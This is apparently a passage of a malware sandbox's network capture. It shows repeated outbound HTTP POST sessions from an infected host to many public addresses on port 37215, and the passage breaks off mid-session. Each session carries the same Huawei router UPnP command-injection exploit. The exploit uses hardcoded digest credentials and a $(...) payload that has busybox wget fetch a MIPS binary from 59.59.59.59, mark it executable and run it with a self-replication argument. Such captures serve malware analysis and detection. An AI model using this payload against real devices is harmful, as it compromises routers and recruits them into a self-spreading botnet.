                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2135192.168.2.1541242157.146.197.22837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.185873032 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2136192.168.2.154782451.243.217.11137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.187211990 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2137192.168.2.1536854157.154.73.17137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.187349081 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2138192.168.2.1550284157.93.166.14837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.187372923 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2139192.168.2.1556278157.38.0.4037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.187525034 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2140192.168.2.155335641.242.50.6837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.187885046 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2141192.168.2.1548982157.215.64.24837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.190675974 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2142192.168.2.154444441.165.173.2037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.190913916 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2143192.168.2.1559456197.22.214.1537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.191211939 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2144192.168.2.153994841.58.158.8337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.193294048 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 